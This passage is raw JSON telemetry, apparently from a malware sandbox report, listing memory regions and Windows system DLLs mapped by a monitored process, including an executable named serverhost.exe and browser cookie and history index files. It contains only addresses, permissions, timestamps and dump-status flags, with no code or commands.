dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 10043391, "entry_point": 0, "filename": null, "id": "region_2510", "name": "private_0x0000000000970000", "norm_filename": null, "region_type": "private_memory", "start_va": 9895936, "timestamp": "00:02:00.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940127744, "type": "region", "version": 1 }, "end_va": 1941155839, "entry_point": 1940199393, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_2511", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940127744, "timestamp": "00:02:00.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_2512", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_2513", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 10239999, "entry_point": 0, "filename": null, "id": "region_2514", "name": "private_0x00000000009a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10092544, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 10326015, "entry_point": 0, "filename": null, "id": "region_2515", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 30015487, "entry_point": 0, "filename": null, "id": "region_2516", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1897529344, "type": "region", "version": 1 }, "end_va": 1897840639, "entry_point": 1897540628, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_2517", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1897529344, "timestamp": "00:02:00.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1829699584, "type": "region", "version": 1 }, "end_va": 1849974783, "entry_point": 1829699584, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2518", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1829699584, "timestamp": "00:02:00.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 31719423, "entry_point": 0, "filename": null, "id": "region_2519", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:02:00.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_2520", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:02:00.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 28278783, "entry_point": 0, "filename": null, "id": "region_2521", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:02:00.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 28704768, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_2522", "name": "private_0x0000000001b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 28704768, "timestamp": "00:02:00.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1809383424, "type": "region", "version": 1 }, "end_va": 1829658623, "entry_point": 1809383424, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2523", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1809383424, "timestamp": "00:02:00.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 9969663, "entry_point": 0, "filename": null, "id": "region_2526", "name": "private_0x0000000000970000", "norm_filename": null, "region_type": "private_memory", "start_va": 9895936, "timestamp": "00:02:00.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 28606463, "entry_point": 0, "filename": null, "id": "region_2530", "name": "private_0x0000000001b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 28311552, "timestamp": "00:02:00.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 10100735, "entry_point": 0, "filename": null, "id": "region_2534", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:02:00.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1828454400, "type": "region", "version": 1 }, "end_va": 1848729599, "entry_point": 1828454400, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2535", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1828454400, "timestamp": "00:02:00.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1808138240, "type": "region", "version": 1 }, "end_va": 1828413439, "entry_point": 1808138240, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2536", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1808138240, "timestamp": "00:02:00.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 10158080, "type": "region", "version": 1 }, "end_va": 10231807, "entry_point": 0, "filename": null, "id": "region_2537", "name": "private_0x00000000009b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10158080, "timestamp": "00:02:00.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4313087, "entry_point": 0, "filename": null, "id": "region_2538", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:02:00.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962344448, "type": "region", "version": 1 }, "end_va": 1962455039, "entry_point": 1962382265, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_2539", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962344448, "timestamp": "00:02:00.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 10342399, "entry_point": 0, "filename": null, "id": "region_2540", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:02:00.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964965888, "type": "region", "version": 1 }, "end_va": 1966133247, "entry_point": 1964965888, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_2541", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964965888, "timestamp": "00:02:03.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963655168, "type": "region", "version": 1 }, "end_va": 1963704319, "entry_point": 1963655168, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_2542", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963655168, "timestamp": "00:02:03.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1990721536, "type": "region", "version": 1 }, "end_va": 1991991295, "entry_point": 1990721536, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_2543", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1990721536, "timestamp": "00:02:03.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969836031, "entry_point": 1968832512, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_2544", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:02:03.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1985871872, "type": "region", "version": 1 }, "end_va": 1987948543, "entry_point": 1985871872, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_2545", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1985871872, "timestamp": "00:02:03.866", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953525759, "entry_point": 1953431552, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_2546", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:02:04.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1939996672, "type": "region", "version": 1 }, "end_va": 1940049919, "entry_point": 1939996672, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_2547", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1939996672, "timestamp": "00:02:04.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 94208, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30109695, "entry_point": 30023056, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", "id": "region_2548", "name": "serverhost.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "region_type": "memory_mapped_file", "start_va": 30015488, "timestamp": "00:02:04.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_2549", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:02:04.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_2550", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:02:04.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1957756928, "type": "region", "version": 1 }, "end_va": 1957847039, "entry_point": 1957756928, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_2551", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1957756928, "timestamp": "00:02:07.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30261247, "entry_point": 30015488, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_2552", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 30015488, "timestamp": "00:02:07.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30261247, "entry_point": 30020237, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_2553", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 30015488, "timestamp": "00:02:07.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955266560, "type": "region", "version": 1 }, "end_va": 1955508223, "entry_point": 1955271309, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_2557", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955266560, "timestamp": "00:02:07.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 28704767, "entry_point": 0, "filename": null, "id": "region_2558", "name": "private_0x0000000001b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 28639232, "timestamp": "00:02:08.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30031871, "entry_point": 0, "filename": null, "id": "region_2559", "name": "pagefile_0x0000000001ca0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30015488, "timestamp": "00:02:08.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 28655615, "entry_point": 0, "filename": null, "id": "region_2560", "name": "pagefile_0x0000000001b50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28639232, "timestamp": "00:02:08.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 28647423, "entry_point": 0, "filename": null, "id": "region_2590", "name": "pagefile_0x0000000001b50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28639232, "timestamp": "00:02:08.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30081023, "entry_point": 30015488, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_2591", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 30015488, "timestamp": "00:02:08.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30113791, "entry_point": 30081024, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_2592", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 30081024, "timestamp": "00:02:08.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30212095, "entry_point": 30146560, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_2593", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 30146560, "timestamp": "00:02:08.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984516095, "entry_point": 1984299008, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_2594", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:02:08.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997275136, "type": "region", "version": 1 }, "end_va": 1997299711, "entry_point": 1997275136, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_2595", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997275136, "timestamp": "00:02:08.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 589824, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_2596", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:02:08.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1956184064, "type": "region", "version": 1 }, "end_va": 1956462591, "entry_point": 1956184064, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_2597", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1956184064, "timestamp": "00:02:08.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 589824, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33947647, "entry_point": 0, "filename": null, "id": "region_2598", "name": "private_0x0000000001fd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33357824, "timestamp": "00:02:08.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1932918784, "type": "region", "version": 1 }, "end_va": 1933033471, "entry_point": 1932918784, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_2599", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1932918784, "timestamp": "00:02:08.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1932853248, "type": "region", "version": 1 }, "end_va": 1932881919, "entry_point": 1932853248, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_2600", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1932853248, "timestamp": "00:02:08.323", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989554175, "entry_point": 1989541888, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_2601", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:02:08.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1848770560, "type": "region", "version": 1 }, "end_va": 1849106431, "entry_point": 1848770560, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_2602", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1848770560, "timestamp": "00:02:08.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1908998144, "type": "region", "version": 1 }, "end_va": 1909084159, "entry_point": 1908998144, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_2603", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1908998144, "timestamp": "00:02:08.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937559551, "entry_point": 1937506304, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_2604", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:02:08.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30216191, "entry_point": 0, "filename": null, "id": "region_2605", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:02:08.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30216191, "entry_point": 0, "filename": null, "id": "region_2606", "name": "pagefile_0x0000000001cd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30212096, "timestamp": "00:02:08.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1918304256, "type": "region", "version": 1 }, "end_va": 1918328831, "entry_point": 1918304256, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_2607", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1918304256, "timestamp": "00:02:08.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 33947648, "type": "region", "version": 1 }, "end_va": 34996223, "entry_point": 0, "filename": null, "id": "region_2608", "name": "private_0x0000000002060000", "norm_filename": null, "region_type": "private_memory", "start_va": 33947648, "timestamp": "00:02:08.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 37879807, "entry_point": 0, "filename": null, "id": "region_2609", "name": "private_0x0000000002320000", "norm_filename": null, "region_type": "private_memory", "start_va": 36831232, "timestamp": "00:02:08.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1934098432, "type": "region", "version": 1 }, "end_va": 1934163967, "entry_point": 